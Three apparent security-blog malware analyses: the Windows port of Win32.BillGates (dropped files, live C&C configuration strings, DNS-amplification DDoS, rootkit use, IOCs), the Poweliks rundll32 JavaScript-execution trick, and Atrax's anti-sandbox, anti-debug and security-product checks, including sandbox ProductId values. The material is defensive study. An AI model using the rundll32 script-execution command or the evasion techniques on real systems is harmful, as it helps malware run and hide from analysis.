The primary infection vector is the exploit of the vulnerability CVE-2014-6332[3], which drops the binary file hosted on an HTTPd File Server (HFS)[4]. This vulnerability allows an attacker to escape the Internet Explorer sandbox with a VBScript script and execute an arbitrary binary file downloaded from the Internet.

figure1

figure1.1

Figure 1 – Example of compromised HFS server

First and foremost, we noticed that this malware seems to be currently in development. The author seems to make tests in the wild, and several samples are unstable.

In a few weeks, we collected about thirty samples, and we identified 2 different versions of the malware:

    • A version almost working on Windows XP but unstable on more recent operating systems.
    • A very unstable version based on Safeengine protector (a packer against reverse engineering)[5].

Both versions reference the same symbol path:
F:\Updates\重构\Gates\Release\Gates.pdb

重构 can be translated by builder.

This article analyzes a sample of the first family named 36000.exe (sha1: 4b14d7aca890642c3e269b75953e65cb)

GatesInstall – Gate 0 – Infection monitor

PDB: F:\\Updates\\重构\\GatesInstall\\Release\\GatesInstall.pdb

This is the installation part of the malware, that will drop the different files in the system, and create persistence.

This sample in not obfuscated, but we have met some UPX packed samples.

This binary file embeds seven executable resources.

tableEXE

Figure 2 – PEStudio view of the binary

figure2_table

As we can infer from the PDB path, this binary file is the installer of Win32.BillGates malware.

On its first execution, it checks if the system is not already infected by trying to kill BillGates instance with the system tool taskkill.exe :
Taskkill /F /IM DbSecuritySpt.exe
Taskkill /F /IM Bil.exe
Taskkill /F /IM svch0st.exe
Taskkill /F /IM DNSClient.exe
Taskkill /F /IM DNSProtection.exe

/F is for killing process, /IM is the image name.

After this check, the malware checks the OS version with GetOsVersionExA and fills a global variable with the following value. It is supposed to support all versions of Windows:

Windows Server 2008 R2
Windows Server 2008
Windows 7
Windows Vista
Windows Server 2003
Windows XP
Windows 2000
Windows NT
Windows 32s
Windows Unknown

After that, it checks if it runs on a 32 or a 64-bit OS with the help of the GetSystemWow64DirectoryA API.

Happy to play with an old Windows installation, I tried to launch the installer on Windows 2000 but I was disappointed: GetSystemWow64DirectoryA is only available starting from Windows XP, so the process does not start due to this unresolved reference:

pointdentree-introuvable

Figure 3- Error: Unable to find entry point of GetSystemWow64DirectoryA Proc on kernel32.dll

The detection of OS older than Windows XP is then pretty useless.

After that check, the malware installation depends on the version of the OS.

On Windows 2003 / XP, the following files are created:

C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe (resource 107 or 108)
C:\Program Files\DbSecuritySpt\svch0st.exe (resource 104)
C:\Program Files\Windows Media Player\agony.exe ( resource 103)
C:\Program Files\Windows Media Player\agony.sys (resource 102)
C:\Program Files\Windows Media Player\DNSProtection.exe (resource 107 or 108)
C:\Program Files\Windows Media Player\DNSSupport.exe (resource 107 or 108)

On Windows 2008 Server, two additional files are created:

C:\Program Files\DbSecuritySpt\NPF.sys (resource 105)
C:\Program Files\DbSecuritySpt\packet.dll (resource 106)

DbSecuritySpt.exe, DNSSupport.exe and DNSProtection.exe have the same contents. On the 32-bit edition of the OS, resource 107 is used whereas resource 108 is used on the 64-bit variant of the OS.

After several tests, Win32.Billgates is only able to start on Windows XP. On newer versions of Windows, the installer simply crashes. This crash seems to be related to ASLR. In fact, when the code attempts to retrieve the security cookie in functions handling buffers, it references a hard-coded address as if the binary file was loaded at a fixed address. This generates an access violation.

afterviolation1 afterviolation2

The rest of this article details the analysis of the malware on Windows XP.

Once the binary files are written to disk, GateInstall launches DbSecuritySpt.exe and DNSSupport.exe as services. Creating services requires administrator privileges. In most cases, attackers gain administrator privileges by brute forcing administrator RDP account on Windows Server 2003 computers.

That’s all for the installer.

General

GateInstall writes the same binary file in 3 locations:

C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe (resources 107 or 108)
C:\Program Files\Windows Media Player\DNSProtection.exe (resources 107 or 108)
C:\Program Files\Windows Media Player\DNSSupport.exe (resources 107 or 108)

PDB: F:\\Updates\\重构\\GatesInstall\\Release\\Gates.pdb

Gates starts by an identification routine:

      • Decryption of its configuration
      • Check of the file path and if it is launched as a service.

The configuration is encrypted with a hard-coded RSA 1024 key:

configuration1

Once decrypted, the configuration data is organized in the same way as the ELF version[6]:

configuration2

In the Windows version, Prime C, D and modulus N offset are hard-coded, meaningless and not used.

In this sample we noticed an empty campaign name, but other analyzed samples were linked? to a named campaign:

39.109.0.113:36000:1:1:Cluster:0:737752:737232:736712
say.f322.net:36000:1:1:Cluster:0:737752:737232:736712
1.82.184.200:36000:1:1:linzigege319:0:737752:737232:736712
mou521.f3322.org:52000:1:1:Cluster:0:737752:737232:736712
129.231.45.171:36000:1:1:sys:0:737752:737232:736712

The Windows binary file also contains some clear strings that allow us to say it is a variant of the ELF version:

ELF-version

DbSecuritySpt – Gate 1 – Host

Launched as a service, DbSecuritySpt is the main persistent binary file that is run. To get into DbSecuritySpt behavior, the binary file must be launched as a service from C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe.

DbSecuritySpt launches several threads in charge of fingerprinting the computer, communicating with the C&C infrastructure and performing DDos actions.

The following data is sent to the C&C:

DbSecuritySpt – Gate 1 – Host

DDoS

This service is also in charge of taking part of DDoS campaigns.

DbSecuritySpt is supposed to support several DDoS types: ICMP, SYN UPD and DNS amplification.

The binary file contains a list of 230 hardcoded IP addresses that correspond to DNS servers used for DNS amplification attacks[7].

DDoS

We tested these DNS servers. Only 58 IP addresses seem to be still vulnerable. The other servers were either patched or unreachable.

svch0st – Gate 2 – Backdoor

PDB: E:\SVN\trunk\2014\小陈\重构\IECtrl\Release\IECtrl.pdb

小陈 can be translated as Chen and重构 as builder.

At last, GateInstall drops the binary file C:\Program Files\DbSecuritySpt\svch0st.exe.

The original name of this file is IECtrl.exe. IECtrl is an independent tool also used by other malwares (such as Win32:Wapomi-B https://www.virustotal.com/fr/file/4d7d9a80973b61f5fecdfdcd2e050ed9bc9541ad82ff68c864d851632ca16a77/analysis/ )

It implements the backdoor functionalities of Win32.BillGates. This tool is identified by Microsoft as « Trojan:Win32/WebToos.B ».

DbSecuritySpt.exe passes a list of C&C server URLs as a parameter to IECtrl. IECtrl contains the logic to download, extract and execute payload from these URLs.

DNSSupport – Gate 3 – Spoofing utility

DNSSupport must be run as a service from the location C:\Program Files\Windows Media Player\DNSSupport.exe. Its behavior is simple: it is in charge of launching DNSProtection.exe and leaves the process in an infinite loop preventing the service from being stopped.

Spoofing utility

DNSProtection

DNSProtection is a “spoofing utility” Gate. It is not functional in the analyzed sample. However, static analysis of the binary file allows drawing some conclusions about its internal behavior.

DNSProtection is used for hiding infection traces. It uses the rootkit Agony. Agony is composed of an executable (agony.exe) that loads and runs a driver (agony.sys). This rootkit was released in the wild some years ago. It is used for hiding files, services and network connections. This malware uses DNSProtection for hiding all dropped files (DNSSupport.exe, DNSProtection.exe, DbSecuritySpt.exe, agony.sys, agony.exe and svch0st.exe) and the connections to the C&C servers.

DNSProtection

Agony.sys cannot be loaded on a 64-bit version of the operating system as it is not signed.

Conclusion

Win32.BillGates developers seem not to be used to develop malwares for the Windows operating system. They use poor techniques that can easily be detected by anti-virus software, and the limitations in terms of operating system compatibility could be easily avoided. This Windows port should not be a big threat as the ELF version is.

ELF structure compared with Windows version:

      • GateInstall : Gate 0
      • DbSecuritySpt : Gate 1
      • Svch0st : Gate 2
      • DNSSupport / DNSProtection : Gate 3

Bonus

During our analysis, we noticed some samples with strange behaviors (hooking, binary file infection, IRC connections …). After further analysis it appears that some samples were infected by Win32.Virut and Win32.parite viruses. Virut and Parite are viruses that infect ‘.exe’ and ‘.scr’ Windows binary files on disk. It is possible that the crooks using BillGates malware are working on infected systems.

This may also explain why a lot of Win32.Parite cleaning tools were discovered on several malicious working BillGates C&C servers we visited. J

Here is a screenshot of such a tool:

Bonus

About 30% of analyzed samples were infected by Win32.Parite and 20% by win32.Virut.

 

Appendices

Some Win32.BillGates hashes:

fb7e7b5c35bb5311acc8139350344878
51f00e56b4ef21e6b7d6685ca3fbad1a
f864867f277330f81669a7c90fb6a3f4
c32f27eaadda31c36e32e97c481771c9
8e9e4da1272f0b637917201443fcbd0a

Win32.BillGates infected by Win32.Virut:

93fe8980c6279c090924e8669b0cb582
2130df6f7817c86890a5e922f99430a3

Win32.BillGates infected by Win32.Parite:

129877bf0cbc9b8239c674810675f6f7
6ab1b709903e144e7bf8fb67d7b8ec61

IOCs:

      • Created files :
        • C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe
        • C:\Program Files\DbSecuritySpt\svch0st.exe
        • C:\Program Files\Windows Media Player\agony.exe
        • C:\Program Files\Windows Media Player\agony.sys
        • C:\Program Files\Windows Media Player\DNSProtection.exe
        • C:\Program Files\Windows Media Player\DNSSupport.exe
        • C:\Program Files\DbSecuritySpt\NPF.sys
        • C:\Program Files\DbSecuritySpt\packet.dll
      • Created services:
        • DbSecuritySpt
        • DNSSupport
      • Running processes:
        • DbSecuritySpt
        • DNSSupport
        • DNSProtection
        • exe

[1] https://www.botconf.eu/wp-content/uploads/2014/12/2014-2.10-Chinese-Chicken-Multiplatform-DDoS-Botnets.pdf

[2] http://www.novetta.com/wp-content/uploads/2015/06/NTRG_ElasticBotnetReport_06102015.pdf

[3] https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332

[4] http://blog.malwaremustdie.org/2014/11/china-elf-botnet-malware-infection.html

[5] http://www.safengine.com/en-us 

[6] http://www.novetta.com/wp-content/uploads/2015/06/NTRG_ElasticBotnetReport_06102015.pdf

[7] https://blog.cloudflare.com/deep-inside-a-dns-amplification-ddos-attack/

Related works:

MalwareMustDie : http://blog.malwaremustdie.org/2014/11/china-elf-botnet-malware-infection.html

Avast: https://www.botconf.eu/wp-content/uploads/2014/12/2014-2.10-Chinese-Chicken-Multiplatform-DDoS-Botnets.pdf

Novetta: http://www.novetta.com/wp-content/uploads/2015/06/NTRG_ElasticBotnetReport_06102015.pdf

habrahabr.ru: http://habrahabr.ru/post/213973/

Poweliks – Command Line Confusion

Recently, hFireF0X provided a detailed walkthrough on the reverse engineering forum kernelmode.info about Win32/Poweliks malware. The particularity of this malware is that it resides in the Windows registry and uses rundll32.exe to execute JavaScript code.

I found it funny that we can execute some JavaScript through Rundll32 and obviously I was not the only one.

Capture d’écran 2014-08-20 à 15.57.26

When we first saw the command line executing JavaScript, we were wondering how it worked.

In this blog post, we analyze how and why JavaScript is executed when calling this simple command line:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert(‘foo’);

Reminder about Rundll32

Rundll32 usage is documented on MSDN; it is used to call an exported function of a DLL file which can be achieved with the following command line:

RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>

entrypoint is the exported function; its prototype must be:

void CALLBACK EntryPoint(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow);

The lpszCmdLine parameter is given the <optional arguments> value specified on the rundll32 command line.

We will try to figure out how Rundll32 is able to call the function RunHTMLApplication exported by the library mshtml.dll and how the “javascript:” prefix is used to execute actual JavaScript code.

Analysis of Rundll32

Parameters

One of the first things done by Rundll32 is to parse the command line in the internal function ParseCommand. This function searches for a comma (‘,’, 0x2C) to locate the DLL name and for a space (‘ ‘, 0x20) to locate the entrypoint name.

Capture d’écran 2014-08-20 à 16.00.23

When using our sample command line, ParseCommand returns javascript:"\..\mshtml as the DLL name and RunHTMLApplication as the entrypoint. In this context, the space after RunHTMLApplication delimits the ‘optional arguments’ part of the rundll32 command line:

Capture d’écran 2014-08-20 à 16.01.37

Dll loader

Rundll32 will perform several tries to load the actual DLL from the initial specification javascript:"\..\mshtml.

The first test uses the function GetFileAttributes(“javascript:”\..\mshtml”). This function eventually accesses C:\Windows\system32\mshtml. As this file is not found, the function returns -1.

Capture d’écran 2014-08-20 à 16.04.07

SearchPath is then invoked to resolve the DLL name. This function reads the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeProcessSearchMode. The Microsoft definition of this key is:

When the value of this REG_DWORD registry value is set to 1, SearchPath first searches the folders that are specified in the system path, and then searches the current working folder. When the value of this registry value is set to 0, the computer first searches the current working folder, and then searches the folders that are specified in the system path. The system default value for this registry key is 0.

By default this registry key doesn’t exist (on Windows XP / 7 / 8) so SearchPath tries to load the file mshtml in the current directory of rundll32 (c:\windows\system32) prior to trying locating it in the system path.

Capture d’écran 2014-08-20 à 16.05.45

All these attempts fail and rundll32 moves to the next step. GetFileAttributes is called again searching for the manifest for the module: javascript:”\..\mshtml.manifest

Capture d’écran 2014-08-20 à 16.07.09 Since all the previous steps failed, Rundll32 eventually calls LoadLibrary("javascript:"\..\mshtml").

LoadLibrary is just a thin wrapper around LdrLoadDll located in ntdll.dll. Internally, LdrLoadDll adds the default extension .dll and parses the resulting string javascript:”\..\mshtml.dll as a path. The token .. instructs to go one folder up: it resolves to mshtml.dll (think of foo\..\mshtml.dll resolved as mshtml.dll).

With mshtml.dll specification, LdrLoadDll is able to load the library in the system directory.

Capture d’écran 2014-08-20 à 16.09.02 Rundll32 then calls GetProcAddress with the previously extracted entry point name RunHTMLApplication.

For the moment, the javascript: prefix seems pretty useless: LoadLibrary("foobar:\"\..\mshtml") works fine. So, why prefixing with javascript:?

Protocols Handler

Once the entry point address has been resolved, Rundll32 calls the function mshtml.dll!RunHTMLApplication.

Even if not documented, the actual RunHTMLApplication can be inferred from the call made by c:\windows\system32\mshta.exe (the application dedicated to launch an .hta file):

HRESULT RunHTMLApplication(
HINSTANCE hinst,
HINSTANCE hPrevInst,
LPSTR szCmdLine,
int nCmdShow
);

This is not far from the function prototype expected for a rundll32 entry point:

void CALLBACK EntryPoint(
HWND hwnd,
HINSTANCE hinst,
LPSTR lpszCmdLine,
int nCmdShow
);

RunHTMLApplication receives a handle to a window instead of a handle to a module as the first parameter. This parameter is used when mshml registers for a window class and creates a window of this new class. Passing a value not corresponding to an actual instance doesn’t seem to disturb user32 very much…

The second parameter is not used at all, so the mismatch is not important.

The last parameter, nCmdShow, is used by the RunHTMLApplication function to display the window hosting the HTML application. Rundll32 always calls the entry point function with the value SW_SHOWDEFAULT to instruct any potential opened window to use window default placement.

The main parameter of interest would be lpszCmdLine (";alert('foo')) in our case.

Capture d’écran 2014-08-20 à 16.16.36

This obviously leads to an issue since this is not a valid JavaScript statement (please note the missing double-quote at the end of the statement). But it works anyway, because RunHTMLApplication ignores the given parameter and prefers to request again the original command line from the GetCommandLine Windows API (wrapped in a call to the GetCmdLine function).

Capture d’écran 2014-08-20 à 16.20.09

The full command line contains the name of the executable and the parameters: GetCmdLine extracts the parameters by cleaning up the executable specification:

Capture d’écran 2014-08-20 à 16.23.29

After that, RunHTMLApplication calls CreateUrlMoniker:

Capture d’écran 2014-08-20 à 16.25.04

This is where the string « javascript: » is essential.

CreateUrlMoniker parses the command line to extract the string before the char “:” (0x3A): “javascript”.
Capture d’écran 2014-08-20 à 16.28.27

CreateUrlMoniker crawls the registry key HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\. These keys refer to a set of protocols and their CLSID.

CreateUrlMoniker finds an appropriate protocol handler for the JavaScript protocol (HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\javascript):

Capture d’écran 2014-08-20 à 16.29.55

The CLSID {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} matches « Microsoft HTML Javascript Pluggable Protocol ».

Capture d’écran 2014-08-20 à 16.31.51

It is for this reason that the string “javascript” is essential in the beginning of the parameters.

The same mechanism comes into play when one types javascript:alert(‘foo’); in the Internet Explorer navigation bar:

Capture d’écran 2014-08-20 à 16.34.18

The remaining of the string located after the ‘:’ separator is interpreted by the JavaScript URL moniker as JavaScript instructions:

"\..\mshtml,RunHTMLApplication ";alert(‘foo’);

This is a valid JavaScript with a string "\..\mshtml,RunHTMLApplication " (hence the double-quotes skipped in all the previous steps!) and a function (alert).

Finally RunHTMLApplication calls CHTMLApp::Run and the JavaScript is executed:

Capture d’écran 2014-08-20 à 16.35.36

Security point

From a security point of view, executing JavaScript through Rundll32 is like executing an HTML Application.

In other words, we can have all the power of Internet Explorer—its object model, performance, rendering power and protocol support—without enforcing the strict security model and user interface of the browser. Zone security is off, and cross-domain script access is allowed, we have read/write access to the files and system registry on the client machine.

With this trick, JavaScript is executed outside the Internet Explorer process and script is not subject to security concept like Protected Mode / Sandbox on Vista and superior.

Conclusion

RunHTMLApplication has the perfect prototype to work with Rundll32. Attackers have made great efforts to build a command line using the perfect syntax for passing through all the mechanisms (library loading, command line parsing, URL syntax correctness, valid JavaScript, etc.) leading to JavaScript execution in an uncontrolled environment.

From our understanding, this technique allows bypassing some security products that may trust actions performed by the built-in rundll32 while specifying the script to run without writing any file on the file system.

That’s all folks!

Win32/Atrax.A

Atrax is a malware discovered during the summer of 2013. It includes some basic features like distributed denial-of-service, keylogging, the ability to steal banking credentials, to send spam or to install a Bitcoin miner for crafting bitcoin money. The particularity of Atrax is that it communicates with command and control server over TOR, which is a protocol that enables online anonymity. An ESET blog post has been made to give more information about this tor based botnet: http://www.welivesecurity.com/2013/07/24/the-rise-of-tor-based-botnets/.

Atrax’s specification highlight us about anti-analyzer technics:

[...]
- Anti-Analyzer (Protection against e.g. anubis.iseclab.org, malwr.com)
- If you need: Anti-VM (Please request it explicitly)
- Anti-Debug/Anti-Hook Engine
[…]

The sample we studied was seen in the wild in April 2014 and submitted to the VirusTotal web site (https://www.virustotal.com/en/file/adf246a57baecef5c8c85c60152e9b2f5060bf2e720ad1623cc95177e7259401/analysis/).

We choose to analyze the Atrax botnet in the process of our permanent security monitoring, in order to be sure that our best of breed HIPS engine is able to block new technics used by hackers. This article is not a full analysis of the malware, it chooses to focus on the capabilities to do not be detected or analyzed.

Sandbox detection

We started by looking at the anti-sandbox capability. To obtain a fast dynamic analysis of a potential malware, many online services provide sandbox capabilities to give you a deeper look of what the application is doing on the operating system: the principle is to start the malware execution in a virtual machine to trace its behavior. At the end of the timeout the service provides a report and sets the virtual machine to its initial state for the next analysis. In this way, we can quickly know if a binary file is malicious or not. Malwares now try to detect this kind of sandbox to be sure that people couldn’t analyze the behavior of the malware or that security solution couldn’t block it proactively.

To test the protection mechanism of Atrax, the sample was submitted to multiple online sandboxes:

  • Anubis http://anubis.iseclab.org/: when executing, the binary file crashes (STATUS_ACCESS_VIOLATION) preventing behavioral analysis. It is a normal behavior of Atrax when it detects online sandbox. The virtual machine was not infected.
  • Malwr http://malwr.com: the binary file runs normally, the virtual machine was infected.
  • JoeBox (CWSandbox / File-analyzer) http://file-analyzer.net/: The binary file runs normally, the virtual machine was infected.
  • Comodo http://camas.comodo.com: the binary file runs normally, the virtual machine was infected.

Except Anubis, it becomes clear that the detection of sandbox is not fully functional. This dysfunction is due to the method used for environment fingerprinting. Atrax simply looks for the ProductId of the operating system.

ProductId is a unique value of 20 digits which is derived from the product key and the hardware configuration. This key is just displayed to user for information. It can be used when you contact the Microsoft Support. This key is stored in the registry key located here: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId. You can display it by right-clicking My Computer and selecting Properties:

Capture d’écran 2014-08-20 à 14.37.28

 

Because it is unique, this key enables identifying the computer. However it is possible to alter this key without having any instability.

Atrax has an hardcoded list of ProductId keys:

-   1: 76487-640-1457236-23837
-   2: 76487-644-3177037-23510
-   3: 55274-640-2673064-23950
-   4: 76497-640-6308873-23835
-   5: 76487-640-1464517-23259

If it finds one these values, its means that the actual environment is an online sandbox and Atrax process exits with an access violation.

Capture d’écran 2014-08-20 à 14.39.33

 

In order to check the correspondence of these values, we developed a test program that display the ProductId value of the sandboxes available on Internet.

Some sandboxes report screenshots of the virtual machine, so it is easy to check the ProductId with a MessageBox. For sandboxes which do not report screenshot, the binary file creates a text file with the ProductId as filename.

long lResult =
RegOpenKeyEx(HKEY_LOCAL_MACHINE,L"Software\\Microsoft\\Windows NT\\CurrentVersion",0,KEY_QUERY_VALUE,&hkey );
if(ERROR_SUCCESS == lResult)
{
DWORD keytype;
TCHAR data[200];
DWORD bread=200;
lResult =
RegQueryValueEx(hkey,L"ProductId",NULL,&keytype,(BYTE*)&data,&bread);

if(ERROR_SUCCESS == lResult)
{
// Key found
MessageBox(0,data,L"fingerprint",1);
found = _tfopen(data, TEXT("w"));
fclose(found);
}

With this trick, we have determined that the first key (76487-640-1457236-23837) is the ProductId of Anubis sandbox. This is why the execution inside this sandbox turns into STATUS_ACCESS_VIOLATION.

The second and third keys do not work due to updated sandboxes. These keys are some kind of signature that matches CWSandbox and JoeBox.

76487-644-3177037-23510: matches CWSandbox.

55274-640-2673064-23950: matches JoeBox.

CWSandbox and JoeBox now appear to be a single product: JoeSecurity is accessed through the URL http://file-analyzer.net/. JoeSecurity now automatically generates a new key for each run, making the two previously known keys obsolete. But strangely they are a recognizable pattern easy to detect. For example:

Windows XP:
78387-783-7838756-78387
89955-899-8995528-89955

Windows 7:
24752-247-2475255-24752
65168-651-6516896-65168

Funny fact, during our tests we have to submit several times our fingerprint executable to be sure that the ProductId is unique at each run. This apparently did not please JoeSecurity and our IP address was simply banned from the server.

The last two keys 76497-640-6308873-23835 and 76487-640-1464517-23259 are less common and seem to be related to old instances of Malwr sandbox. Today Malwr generates a unique key for each run with no identifiable pattern:

43587-502-6867763-42122
65925-308-4191880-45994
68959-300-3102090-30654
27323-986-4834729-34486
69978-592-8045283-75626

In addition, although it is not implemented into Atrax, it is possible to detect if an executable file has been uploaded to VirusTotal; the sandbox associated to the “Behavioral information” section has always the same ProductId: 76487-341-0620571-22546.

As we can see, this technique is not really efficient for multiple reasons. First, because it is easy to implement a mechanism to auto generate a ProductId for each run. We tried to edit the ProductId of Windows 7 and Windows Update was fully functional. Moreover, looking at this registry key can be detected as a malicious behavior. It is not common for an executable file to look for the ProductId of the operating system.

Security products detection

Atrax also checksif security productshaveinjectedcode in therunning process of the malware.

To do this check, it uses a well-documented technics:

  • It finds PEB (Process Environment Block address) (instruction mov eax, fs :0x30)
  • It looks for Ldr (LoaderData) in PEB (instruction mov ecx, [eax+0x0C])
  • It finds the InLoadOrderLinks list which contain all the module loaded by the running process (instruction mov edi, [ecx+0x0C])
  • It browses InLoadOrderLinks and compares it to some values.

Capture d’écran 2014-08-20 à 14.54.36

 

For more information about this method: http://phrack.org/issues/65/10.html,

Atrax looks for the following loaded binary files to detect if a security product monitors the current application:

This technique is limited to a few security products but does not prevent detection by antivirus.

Anti Debug

Atrax uses 3 different technics to check the presence of a debugger.

ZwSetInformationThread

The first way to do it involves using the ZwSetInformationThread function.

NTSYSAPI NTSTATUS NTAPI ZwSetInformationThread(
IN HANDLE ThreadHandle,
IN THREADINFOCLASS ThreadInformationClass,
IN PVOID ThreadInformation,
IN ULONG ThreadInformationLength
);

When ThreadInformationClass is set to 0x11 (ThreadHideFromDebugger), any debugger becomes blind to actions performed by this thread.

Capture d’écran 2014-08-20 à 15.00.56

 

ZwQueryInformationProcess

The second way to bypass debug involves using ZwQueryInformationProcess in order to find a debugger.

TSTATUS WINAPI ZwQueryInformationProcess(
_In_       HANDLE ProcessHandle,
_In_       PROCESSINFOCLASS ProcessInformationClass,
_Out_     PVOID ProcessInformation,
_In_       ULONG ProcessInformationLength,
_Out_opt_ PULONG ReturnLength
);

 

When ProcessInformationClass is set to 0x7 (ProcessDebugPort), ProcessInformation is set to -1 when the process is being debugged.

Capture d’écran 2014-08-20 à 15.03.33

 

IsDebuggerPresent

Finally, Atrax uses the classical IsDebuggerPresent function call which looks for the BeingDebugged flag inside the PEB. If BeingDebugged equals 1, the process is debugged.

AntiVM

Malware’s specifications refer to VM detection. This functionality seems not to be included into the sample that has been studied but we can find some significant strings inside the binary file:

  • VMWare
  • VBOX
  • DiskVirtual_HD

It looks like some codes about VM detection is present but after static analysis we saw that this part of code is never called.

Conclusion

In this post we have seen that an effort was made to detect security products but the detection of analysis environment are not really well implemented. One year after malware launch, it’s fully detected by the sandboxes and the tricks used here are not efficient.Yet there are a huge number of tricks documented on the Internet for anti-debug, anti-VM and anti-analysis. Atrax uses only the most basics tests.

For further information, please see:
http://waleedassar.blogspot.comhttp://pferrie.host22.com/papers/antidebug.pdf